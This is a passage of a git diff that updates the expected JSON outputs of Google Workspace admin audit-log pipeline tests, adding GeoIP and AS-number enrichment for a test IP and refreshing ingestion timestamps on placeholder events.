"67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493587Z", + "ingested": "2021-12-14T14:44:22.555185992Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"DELETE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "DELETE_ROLE", @@ -226,6 +262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -235,7 +283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493593800Z", + "ingested": "2021-12-14T14:44:22.555186375Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ADD_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "ADD_PRIVILEGE", @@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493598900Z", + "ingested": "2021-12-14T14:44:22.555186742Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"REMOVE_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "REMOVE_PRIVILEGE", @@ -352,6 +412,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -361,7 +433,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493603800Z", + "ingested": "2021-12-14T14:44:22.555187116Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"RENAME_ROLE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "RENAME_ROLE", @@ -416,6 +488,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -425,7 +509,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493607800Z", + "ingested": "2021-12-14T14:44:22.555187649Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UPDATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "UPDATE_ROLE", @@ -480,6 +564,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -489,7 +585,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493613100Z", + "ingested": "2021-12-14T14:44:22.555188004Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UNASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNASSIGN_ROLE", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json index 16011376136..05703a7a8f3 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.510411800Z", + "ingested": "2021-12-14T14:44:23.822101483Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"TRANSFER_DOCUMENT_OWNERSHIP\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "TRANSFER_DOCUMENT_OWNERSHIP", @@ -94,6 +106,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -103,7 +127,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.510420800Z", + "ingested": "2021-12-14T14:44:23.822103637Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"DRIVE_DATA_RESTORE\",\"parameters\":[{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "start": "2002-10-02T12:00:00.000Z", @@ -159,6 +183,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -168,7 +204,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.510426300Z", + "ingested": "2021-12-14T14:44:23.822104130Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"CHANGE_DOCS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_DOCS_SETTING", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json index e9f2d74ccfc..096de2da5a8 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915758200Z", + "ingested": "2021-12-14T14:44:24.297915967Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ACCOUNT_AUTO_RENEWAL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"NON_AUTO_RENEWAL\"}]}}", "provider": "admin", "action": "CHANGE_ACCOUNT_AUTO_RENEWAL", @@ -98,6 +110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -107,7 +131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915761700Z", + "ingested": "2021-12-14T14:44:24.297918300Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_ENABLED\",\"value\":\"app enabled\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "ADD_APPLICATION", @@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -171,7 +207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915767800Z", + "ingested": "2021-12-14T14:44:24.297918820Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "ADD_APPLICATION_TO_WHITELIST", @@ -226,6 +262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -235,7 +283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915773500Z", + "ingested": "2021-12-14T14:44:24.297919157Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ADVERTISEMENT_OPTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_ADVERTISEMENT_OPTION", @@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915778400Z", + "ingested": "2021-12-14T14:44:24.297919495Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "CREATE_ALERT", @@ -354,6 +414,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -363,7 +435,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915782300Z", + "ingested": "2021-12-14T14:44:24.297919855Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ALERT_CRITERIA\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "CHANGE_ALERT_CRITERIA", @@ -418,6 +490,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -427,7 +511,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915787Z", + "ingested": "2021-12-14T14:44:24.297920184Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "DELETE_ALERT", @@ -482,6 +566,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -491,7 +587,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915790700Z", + "ingested": "2021-12-14T14:44:24.297920578Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_RECEIVERS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALERT_RECEIVERS_CHANGED", @@ -544,6 +640,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -553,7 +661,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915795200Z", + "ingested": "2021-12-14T14:44:24.297920912Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_ALERT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_ALERT", @@ -608,6 +716,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -617,7 +737,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915799500Z", + "ingested": "2021-12-14T14:44:24.297921254Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_STATUS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALERT_STATUS_CHANGED", @@ -672,6 +792,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -681,7 +813,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915803800Z", + "ingested": "2021-12-14T14:44:24.297921587Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "ADD_DOMAIN_ALIAS", @@ -736,6 +868,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -745,7 +889,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915807600Z", + "ingested": "2021-12-14T14:44:24.297922191Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "REMOVE_DOMAIN_ALIAS", @@ -800,6 +944,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -809,7 +965,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915812400Z", + "ingested": "2021-12-14T14:44:24.297922551Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "SKIP_DOMAIN_ALIAS_MX", @@ -864,6 +1020,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -873,7 +1041,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915816300Z", + "ingested": "2021-12-14T14:44:24.297922893Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "VERIFY_DOMAIN_ALIAS_MX", @@ -928,6 +1096,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -937,7 +1117,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915821100Z", + "ingested": "2021-12-14T14:44:24.297923228Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"DOMAIN_VERIFICATION_METHOD\",\"value\":\"ANALYTICS\"}]}}", "provider": "admin", "action": "VERIFY_DOMAIN_ALIAS", @@ -992,6 +1172,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1001,7 +1193,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915826900Z", + "ingested": "2021-12-14T14:44:24.297923557Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_OAUTH_ACCESS_TO_ALL_APIS", @@ -1057,6 +1249,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1066,7 +1270,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915832800Z", + "ingested": "2021-12-14T14:44:24.297924104Z", "original": 